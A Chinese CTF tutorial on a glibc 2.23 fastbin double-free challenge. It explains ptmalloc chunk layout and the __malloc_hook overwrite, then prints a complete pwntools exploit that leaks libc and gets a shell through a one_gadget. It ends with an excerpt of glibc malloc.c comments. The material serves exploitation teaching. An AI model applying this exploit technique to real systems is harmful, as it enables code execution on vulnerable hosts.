从这道题目开始,我们正式进入堆的世界~
由于最新版系统的libc版本升级后加入了tcache机制,我们只能使用旧版系统来完成后面一系列的入门级堆题目。我采用的系统是Ubuntu 16.04。
实验平台:
x86_64, Ubuntu 16.04.7 LTS, Kernel 4.15.0-142-generic
GLIBC 2.23-0ubuntu11.3
实验Binary及答案:https://github.com/bjrjk/pwn-learning/tree/main/FastBin/fastbin
ELF的保护措施:
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: No PIE (0x400000)
没有开启PIE,可以覆写GOT表。
反编译后的结果如下:
void __fastcall __noreturn main(__int64 a1, char **a2, char **a3)
{
int v3; // [rsp+4h] [rbp-Ch] BYREF
unsigned __int64 v4; // [rsp+8h] [rbp-8h]
v4 = __readfsqword(0x28u);
init_stdFILE();
puts("what's your name:");
read(0, name_bss, 0x20uLL);
printf("hello, %s", name_bss); // name_bss: 0x602100
while ( 1 )
{
putchar('>');
__isoc99_scanf("%d", &v3);
if ( v3 == 1 )
create();
if ( v3 == 2 )
delete();
if ( v3 == 3 )
print();
}
}
void init_stdFILE()
{
setbuf(stdin, 0LL);
setbuf(stdout, 0LL);
setbuf(stderr, 0LL);
}
unsigned __int64 create()
{
int v0; // ebx
_DWORD nbytes[7]; // [rsp+4h] [rbp-1Ch] BYREF
*(_QWORD *)&nbytes[1] = __readfsqword(0x28u);
printf("size ?");
nbytes[0] = 0;
__isoc99_scanf("%d", nbytes);
if ( nbytes[0] < 0 || nbytes[0] > 128 || chunk_count > 11 )
exit(0);
v0 = chunk_count++;
chunk[v0] = malloc(nbytes[0]);
printf("data:");
read(0, chunk[chunk_count - 1], nbytes[0]);
chunk_size[chunk_count - 1] = nbytes[0];
return __readfsqword(0x28u) ^ *(_QWORD *)&nbytes[1];
}
unsigned __int64 delete()
{
int v1; // [rsp+4h] [rbp-Ch] BYREF
unsigned __int64 v2; // [rsp+8h] [rbp-8h]
v2 = __readfsqword(0x28u);
printf("index?");
__isoc99_scanf("%d", &v1);
if ( v1 < 0 || v1 > chunk_count )
exit(0);
free(chunk[v1]); //vulnerable
return __readfsqword(0x28u) ^ v2;
}
unsigned __int64 print()
{
int v1; // [rsp+4h] [rbp-Ch] BYREF
unsigned __int64 v2; // [rsp+8h] [rbp-8h]
v2 = __readfsqword(0x28u);
printf("index?");
__isoc99_scanf("%d", &v1);
if ( v1 < 0 || v1 > chunk_count )
exit(0);
puts((const char *)chunk[v1]);
return __readfsqword(0x28u) ^ v2;
}
可以看出,C语言代码第57行处存在利用点。它仅仅将指针进行了free,却没有将指针清零。形成了悬空指针(dangling pointer)。
为了做这道题目,我们先来普及一些基本知识~
ptmalloc及chunk的基本介绍
Linux中glibc运行库采用的堆分配器是ptmalloc,绝大多数不使用自定义堆分配器的程序自然也就采用ptmalloc进行动态内存分配。
chunk是ptmalloc分配内存的基本单元,chunk中既包括内存块的元信息,也包括用户数据。
为了加快空闲内存块的分配速度,ptmalloc将空闲的chunk分为四类进行管理:fastbin, smallbin, largebin, unsortedbin,详细信息可参考[1]。chunk之间以双向链表进行连接,属于chunk中的元数据。
下面及后文中的介绍,都以amd64体系结构为例。
chunk的结构体定义为:
struct malloc_chunk {
INTERNAL_SIZE_T mchunk_prev_size; /* Size of previous chunk (if free). */
INTERNAL_SIZE_T mchunk_size; /* Size in bytes, including overhead. */
struct malloc_chunk* fd; /* double links -- used only if free. */
struct malloc_chunk* bk; /* ForwarD & BacK */
/* Only used for large blocks: pointer to next larger size. */
struct malloc_chunk* fd_nextsize; /* double links -- used only if free. */
struct malloc_chunk* bk_nextsize;
};
其中INTERNAL_SIZE_T
类型对于amd64体系结构为8字节,对i686体系结构为4字节。
指针类型同上。
该定义可能令人较为迷惑,建议仔细阅读下面的解释。
一个chunk的布局,在chunk占用或空闲时是不相同的。具体请见下面的ASCII图画[2]。
对于一个已经分配给用户的chunk,布局如图:
chunk-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Size of previous chunk, if unallocated (P clear) |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Size of chunk, in bytes |A|M|P|
mem-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| User data starts here... .
. .
. (malloc_usable_size() bytes) .
. |
nextchunk-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| (size of chunk, but used for application data) |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Size of next chunk, in bytes |A|0|1|
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
其中*chunk
为ptmalloc管理chunk所使用的指针,*mem
为用户所申请到内存的指针。amd64中,这两个指针之间差16个字节,保存的数据mchunk_prev_size
和mchunk_size
,分别是上一个虚拟地址连续chunk的大小(若该chunk为free状态)和当前chunk的大小。这两个大小都将头部的元数据计算在内。
若上一个虚拟地址连续的chunk已经被分配,则mchunk_prev_size
所占用的位置不再保存该区块大小,而是作为上一chunk的用户内存区域。*nextchunk
恰好所指的8字节也说明了这一点。
对于amd64体系结构,chunk堆块总是16(0x10)字节对齐的。对于i686,则是8字节对齐的。因此size的低3比特对于数据表示无效。ptmalloc将其拿来存储状态信息,分别记作A, M, P。
其中A是NON_MAIN_ARENA。ARENA指的是对于一个进程的多个线程,每个线程所独占的内存块区域。当该chunk不归主线程的堆分配器管理时,A位置为1。
M是IS_MMAPPED。指示该chunk直接由mmap系统调用分配,不属于一般的堆区域。
P是PREV_INUSE。若为1,指示上一个虚拟地址连续的chunk已经处在使用状态,则mchunk_prev_size
无效。若为0,则上一个虚拟地址连续的chunk空闲,mchunk_prev_size
有效。
对于一个空闲的chunk,布局如图:
chunk-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Size of previous chunk, if unallocated (P clear) |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
`head:' | Size of chunk, in bytes |A|0|P|
mem-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Forward pointer to next chunk in list |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Back pointer to previous chunk in list |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Unused space (may be 0 bytes long) .
. .
. |
nextchunk-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
`foot:' | Size of chunk, in bytes |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Size of next chunk, in bytes |A|0|0|
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
其它部分的解释说明同上,只是原本用户内存的部分被拿来进行*fd
和*bk
的存储。分别指向了同类双向链表的下一个和上一个chunk。
double free的利用过程
利用double free,我们可以伪造一个任意位置的chunk,并使得malloc将其分配出去。
主要原理是:两次free chunk A之后,chunk A在一条bin链中出现两次。第一次用malloc获取chunk A时,以allocated形态填充unallocated形态的*fd
指针域,使之指向伪造的chunk B。第二次用malloc获取chunk A时,ptmalloc读取*fd
指针域并作为下一个即将分配的chunk。这样就会在下一次malloc时,将伪造的chunk分给用户程序。
需要注意的点包括:
- 我们不能连续两次调用free函数回收同一个指针。因为ptmalloc对于这种情况有特判。因此我们需要在free中间插一个,例如free的顺序可以是A, B, A。
- 伪造chunk时,当前区块的size域必须伪造正确,否则会被ptmalloc的完整性校验拒绝。
__malloc_hook的利用
在ptmalloc中,实现了对很多public函数的hook,即:如果我们想要实现自定义的堆分配器,可以覆写glibc中对应的hook指针。这样调用ptmalloc的对应功能时,控制流会被劫持到我们的自定义函数上。
对于堆题来说,我们一般只能控制数据,而很难操纵控制流。而double free操作__malloc_hook
则提供了一个很好的转移控制流的方法。我们只要将libc中的One_gadget写入到__malloc_hook
后,用户程序只要调用malloc,就会自动getshell,实在是非常方便了。
double free操作__malloc_hook
的方法如下:
对于libc 2.23,可以将地址(char*)&__malloc_hook - 0x23
处作为一个size为0x70的chunk进行伪造。进而我们可以填充 __malloc_hook
。不信你就动手试一下:)
假设我们没有调用malloc的机会,可以连续double free同一个指针,此时glibc的错误处理程序会替你调用malloc(笑死
Exp
在这道题目中,可以利用悬空指针实现double free,进而控制bss段上伪造的ptmalloc chunk,覆盖后面的数据区域,接下来实现任意地址读写。最后分别完成libc基址的泄露和写入one_gadget到__malloc_hook
,进而实现getshell。
下面首先将Exp贴出,后续对上述解题概要进行大体的讲解。
#!/usr/bin/env python2
# coding = utf-8
# Env: Ubuntu 16.04.7 LTS, GLIBC 2.23-0ubuntu11.3, Kernel 4.15.0-142-generic
from pwn import *
from LibcSearcher import *
context(arch = "amd64", os = "linux", log_level = "debug")
def note_init(name):
p.recvuntil("what's your name:\n")
p.send(name)
p.recvuntil('hello, ')
def note_create(size, data):
p.recvuntil('>')
p.sendline('1')
p.recvuntil('size ?')
p.sendline(str(size))
p.recvuntil('data:')
p.send(data)
def note_delete(index):
p.recvuntil('>')
p.sendline('2')
p.recvuntil('index?')
p.sendline(str(index))
def note_print(index):
p.recvuntil('>')
p.sendline('3')
p.recvuntil('index?')
p.sendline(str(index))
p = process('./fastbin')
elf = ELF('./fastbin')
# gdb.attach(p, "")
bss_name = 0x602100
puts_got_addr = elf.got['puts'] # 0x602028
# First Stage: Leak Libc
note_init(p64(0) + p64(0x80)) # set mchunk_prev_size & mchunk_size in malloc_chunk, chunk "bss_name"
note_create(0x70, 'a') # counterfeit a double free fastbin chain
note_create(0x70, 'a')
note_delete(0)
note_delete(1)
note_delete(0) # double free chunk[0]
note_create(0x70, p64(bss_name)) # fill *(&malloc_chunk+offsetof(fd)) (usermem) ,chunk 0
note_create(0x70, 'a') # chunk 1
note_create(0x70, 'a') # chunk 0
note_create(0x70, 'a' * 0x10 + p64(puts_got_addr)) # chunk on BSS: bss_name, overwrite chunk[0] to leak got['puts']
note_print(0)
puts_libc = u64(p.recv(6) + '\x00\x00')
log.info('puts_libc:' + str(hex(puts_libc)))
libc = LibcSearcher('puts', puts_libc)
libc_base = puts_libc - libc.dump('puts')
log.info('libc_base:' + str(hex(libc_base)))
# Second Stage: Overwrite __malloc_hook to one_gadget
malloc_hook_chunk = libc_base + libc.dump('__malloc_hook') - 0x23
log.info('malloc_hook_chunk:' + str(hex(malloc_hook_chunk)))
note_create(0x60, 'a') # counterfeit a double free fastbin chain
note_create(0x60, 'a')
note_delete(6)
note_delete(7)
note_delete(6) # double free chunk[6]
note_create(0x60, p64(malloc_hook_chunk)) # chunk 6
note_create(0x60, 'a') # chunk 7
note_create(0x60, 'a') # chunk 6
one_gadget = libc_base + 0xf03a4
note_create(0x60, 'a'* 0x13 + p64(one_gadget))
note_delete(0) # two consecutive free invoke user malloc
note_delete(0)
p.interactive()
第43行,在程序的bss段伪造一个chunk区块,其中prev_size为0,size为0x80。
第44~48行,实现double free chunk[0]。
第49行,第一次写入chunk[0]的fd,指向伪造的bss_name chunk。
第52行,向bss_name写入内容,正好可以覆盖到note数组的地址。我们借此覆盖note[0]为puts的GOT表地址。
第53~58行,泄露libc基址。
第61~62行,获得伪造malloc_hook_chunk的地址。
第63~67行,进行double free chunk[6]。
第68行,第一次写入chunk[6]的fd,指向malloc_hook_chunk。
第72行,写入__malloc_hook
为one_gadget。
第73行,在这道题目里,我们已经没机会再次调用malloc了,因此连续调用两次free,即可成功getshell。
PS: 在我的repo中还有一个answer2.py
,是本题的另一种做法,大体思路相同。只是在第二次double free时减少了malloc的使用次数,使得能够直接用malloc执行one_gadget。只是可惜在我的机器上没有找到能用的one_gadget,约束都不满足。我以控制流能跳转到我指定的地址0xdeadbeefdeadbeef
为准,也算是没问题了。
参考资料:
[1] https://blog.csdn.net/qq_41453285/article/details/96865321
[2] https://code.woboq.org/userspace/glibc/malloc/malloc.c.html#1075
malloc_chunk details:
(The following includes lightly edited explanations by Colin Plumb.)
Chunks of memory are maintained using a `boundary tag' method as
described in e.g., Knuth or Standish. (See the paper by Paul
Wilson ftp://ftp.cs.utexas.edu/pub/garbage/allocsrv.ps for a
survey of such techniques.) Sizes of free chunks are stored both
in the front of each chunk and at the end. This makes
consolidating fragmented chunks into bigger chunks very fast. The
size fields also hold bits representing whether chunks are free or
in use.
An allocated chunk looks like this:
chunk-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Size of previous chunk, if unallocated (P clear) |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Size of chunk, in bytes |A|M|P|
mem-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| User data starts here... .
. .
. (malloc_usable_size() bytes) .
. |
nextchunk-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| (size of chunk, but used for application data) |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Size of next chunk, in bytes |A|0|1|
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
Where "chunk" is the front of the chunk for the purpose of most of
the malloc code, but "mem" is the pointer that is returned to the
user. "Nextchunk" is the beginning of the next contiguous chunk.
Chunks always begin on even word boundaries, so the mem portion
(which is returned to the user) is also on an even word boundary, and
thus at least double-word aligned.
Free chunks are stored in circular doubly-linked lists, and look like this:
chunk-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Size of previous chunk, if unallocated (P clear) |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
`head:' | Size of chunk, in bytes |A|0|P|
mem-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Forward pointer to next chunk in list |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Back pointer to previous chunk in list |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Unused space (may be 0 bytes long) .
. .
. |
nextchunk-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
`foot:' | Size of chunk, in bytes |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Size of next chunk, in bytes |A|0|0|
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
The P (PREV_INUSE) bit, stored in the unused low-order bit of the
chunk size (which is always a multiple of two words), is an in-use
bit for the *previous* chunk. If that bit is *clear*, then the
word before the current chunk size contains the previous chunk
size, and can be used to find the front of the previous chunk.
The very first chunk allocated always has this bit set,
preventing access to non-existent (or non-owned) memory. If
prev_inuse is set for any given chunk, then you CANNOT determine
the size of the previous chunk, and might even get a memory
addressing fault when trying to do so.
The A (NON_MAIN_ARENA) bit is cleared for chunks on the initial,
main arena, described by the main_arena variable. When additional
threads are spawned, each thread receives its own arena (up to a
configurable limit, after which arenas are reused for multiple
threads), and the chunks in these arenas have the A bit set. To
find the arena for a chunk on such a non-main arena, heap_for_ptr
performs a bit mask operation and indirection through the ar_ptr
member of the per-heap header heap_info (see arena.c).
Note that the `foot' of the current chunk is actually represented
as the prev_size of the NEXT chunk. This makes it easier to
deal with alignments etc but can be very confusing when trying
to extend or adapt this code.
The three exceptions to all this are:
1. The special chunk `top' doesn't bother using the
trailing size field since there is no next contiguous chunk
that would have to index off it. After initialization, `top'
is forced to always exist. If it would become less than
MINSIZE bytes long, it is replenished.
2. Chunks allocated via mmap, which have the second-lowest-order
bit M (IS_MMAPPED) set in their size fields. Because they are
allocated one-by-one, each must contain its own trailing size
field. If the M bit is set, the other bits are ignored
(because mmapped chunks are neither in an arena, nor adjacent
to a freed chunk). The M bit is also used for chunks which
originally came from a dumped heap via malloc_set_state in
hooks.c.
3. Chunks in fastbins are treated as allocated chunks from the
point of view of the chunk allocator. They are consolidated
with their neighbors only in bulk, in malloc_consolidate.